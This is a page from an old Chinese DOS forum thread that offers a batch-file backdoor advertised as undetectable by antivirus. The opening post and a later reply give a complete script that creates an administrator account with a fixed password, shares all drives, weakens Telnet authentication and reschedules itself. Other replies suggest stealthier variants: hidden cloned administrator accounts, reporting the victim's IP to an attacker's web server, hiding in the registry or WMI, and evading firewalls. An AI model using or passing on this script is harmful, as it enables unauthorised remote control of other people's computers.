中国DOS联盟论坛

中国DOS联盟

-- 联合DOS 推动DOS 发展DOS --

联盟域名:www.cn-dos.net  论坛域名:www.cn-dos.net/forum
DOS,代表着自由开放与发展,我们努力起来,学习FreeDOS和Linux的自由开放与GNU精神,共同创造和发展美好的自由与GNU GPL世界吧!

游客:  注册 | 登录 | 命令行 | 会员 | 搜索 | 上传 | 帮助 »
« [1] [2] [3] »
作者:
标题: 用批处理写的后门 永不被杀 上一主题 | 下一主题
bagpipe
银牌会员

DOS联盟捡破烂的


积分 1144
发帖 425
注册 2005-10-20
来自 北京
状态 离线
『楼 主』:  用批处理写的后门 永不被杀

不知道DOS联盟最近为什么这么冷清,希望各位兄弟踊跃发帖!

@echo off
@attrib +s + r hoby.bat
@net user hoby 12345 /add
@net localgroup administrators hoby /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm

@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\hoby.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\hoby.bat
@at 11:05 c:\WINNT\SYSTEM32\hoby.bat
@at 23:05 c:\WINNT\SYSTEM32\hoby.bat
@net stop telnet
@net start telnet
@exit

这样就会循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵~~
运行后TELNET IP上去,用户名为hoby,密码为12345

   此帖被 +6 点积分          点击查看详情   


2006-2-11 10:47
查看资料  发送邮件  访问主页  发短消息 网志   编辑帖子  回复  引用回复
lords
初级用户




积分 114
发帖 5
注册 2005-2-18
状态 离线
『第 2 楼』:  

的确。这种东西不会被当作病毒,木马后门杀。但杀毒软件会提示这是一个危险脚本,照样杀。
这个和VBS,au3的区别多大?

2006-2-17 13:34
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
bagpipe
银牌会员

DOS联盟捡破烂的


积分 1144
发帖 425
注册 2005-10-20
来自 北京
状态 离线
『第 3 楼』:  

对,说的确实没有错,现在网上没有绝对的免杀,只有怎么去绕过或者避免杀毒软件的手法,就跟RADMIN一样,去年好像杀毒软件还不能查杀(除了木马专杀外)现在可能就不成了,所以说知识的更新很快,没有万能的方法,不过我很久就有这样的一个想法,请看下面,多多提意见,我没有试验过.对局域网内部机器不起作用

方法如下:   我说的方法就是TELNET连接(防火墙情况除外,但是也可以躲过防火墙),杀毒软件一般杀不了,不过方法很笨,也很麻烦只是想法而已,我们用批处理克隆一个ADMINISTRATOR账号,提升为管理员,然后克隆一个TELNET服务,让系统自带的TELNET停止,克隆出来的TELNET服务运行(这样情况是可以用TELNET连接的),然后利用脚本的收发邮件的功能给我们指定的邮箱发送这台计算机的外网IP地址,然后我们在去连接,注意我们本地也要建立一个同样的账号和密码的管理员用户,然后我们用这个身份启动运行TELNET程序来连接对方的机器.这个只是我的想法而已,请大家看看,如果有什么不妥请提出您的宝贵意见!!!

2006-2-17 14:21
查看资料  发送邮件  访问主页  发短消息 网志   编辑帖子  回复  引用回复
3742668
荣誉版主





积分 2013
发帖 718
注册 2006-2-18
状态 离线
『第 4 楼』:  

其实用telnet也不是很安全,毕竟别人只要netstat -abnov(XP)就可以看得清清楚楚了
不过CMD的命令的网络功能的确不是很强大,建议用BAT+VBS的方法。
先修改注册表克隆一个administrator帐号(可以克隆一个用net user以及其他工具查看不出来的隐藏管理员帐号,具体方法这里略过),然后修改组策略提升网络登陆的权限,然后利用VBS脚本在后台开一个IE登陆到你自己的web上去(这个web不要让别人知道,这样你就可以从日志里面得到IP),最后就是隐藏自己,最好是能在CIM里面找个地方,也可以在注册表里面找个隐蔽的地方,一定不要放在run键下。
完了之后你在你那边直接从WMIC上登陆来控制,这样防火墙应该是不会杀的,毕竟是windows自带的功能。

2006-2-18 20:07
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
#four#
中级用户




积分 209
发帖 34
注册 2004-5-25
状态 离线
『第 5 楼』:  

@echo off
@attrib +s + r hoby.bat
@net user hoby 12345 /add
@net localgroup administrators hoby /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm

@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\hoby.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\hoby.bat
@at 11:05 c:\WINNT\SYSTEM32\hoby.bat
@at 23:05 c:\WINNT\SYSTEM32\hoby.bat
@net stop telnet
@net start telnet
@exit



请问@net stop schedule
     @net start Schedule是什么意思???

2006-3-1 13:30
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
electronixtar
铂金会员





积分 7493
发帖 2672
注册 2005-9-2
状态 离线
『第 6 楼』:  

支持BagPipe!!!!!




回楼上:启 计划任务 服务以运行下面的 at 命令,有SYSTEM权限的哦~~◎符号的作用是不显示本条命令

[ Last edited by electronixtar on 2006-3-1 at 14:13 ]

2006-3-1 14:10
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
htysm
高级用户




积分 866
发帖 415
注册 2005-12-4
状态 离线
『第 7 楼』:  

这个确实不错,有点意思.

2006-6-26 20:40
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
buddiyar
初级用户





积分 160
发帖 75
注册 2006-6-28
状态 离线
『第 8 楼』:  

@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\hoby.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\hoby.bat

这里的>和>>怎么解释呢?
>在这里相当与重命名了么
还请各位指点啊

2006-7-9 18:22
查看资料  发送邮件  发短消息 网志  OICQ (243589543)  编辑帖子  回复  引用回复
guoqihua
初级用户





积分 24
发帖 13
注册 2007-5-16
状态 离线
『第 9 楼』:  

用批处理写的后门 永不被杀

2007-5-16 14:39
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
ttyp
初级用户





积分 180
发帖 84
注册 2006-9-7
状态 离线
『第 10 楼』:  

还用不被杀?弱点太多了,骗骗菜鸟我看行,
添加用户,至少你克隆用户啊
schedule 服务,稍微安全点的机器都禁用的
telnet 同上
用telnet防火墙会拦截,至少要反弹的吧

脚本用WMI的事件定时器做后门不错

2007-5-16 16:34
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
joinhoone
初级用户





积分 73
发帖 39
注册 2007-5-17
状态 离线
『第 11 楼』:  

想法多多啊。。就是发言的人太少了

2007-5-17 10:47
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
mycs163
新手上路





积分 17
发帖 10
注册 2007-5-27
状态 离线
『第 12 楼』:  

不错

2007-5-27 19:36
查看资料  发短消息 网志   编辑帖子  回复  引用回复
love4u
新手上路





积分 14
发帖 7
注册 2007-6-3
状态 离线
『第 13 楼』:  

我每天都会看windows跟system32下面的文件的,大概有些神经质

net start Schedule这个服务我一定是禁用的

不过见过一些公司,Schedule是打开的,因为要定时用ntbackup东东

个人认为这个方法不够完美

2007-6-3 23:29
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
lvbsl
初级用户





积分 30
发帖 15
注册 2007-6-7
状态 离线
『第 14 楼』:  

Schedule 这个服务一般是禁止的
这样建立后门 理论上是可行的
但用起来 就不那么顺手了

2007-6-7 15:16
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
408857961
新手上路





积分 13
发帖 7
注册 2007-1-24
状态 离线
『第 15 楼』:  

多谢帮助!!!!!!!!!!!!!!



爱dos联盟
2007-6-7 21:35
查看资料  发送邮件  发短消息 网志   编辑帖子  回复  引用回复
« [1] [2] [3] »
请注意:您目前尚未注册或登录,请您注册登录以使用论坛的各项功能,例如发表和回复帖子等。


可打印版本 | 推荐给朋友 | 订阅主题 | 收藏主题



论坛跳转: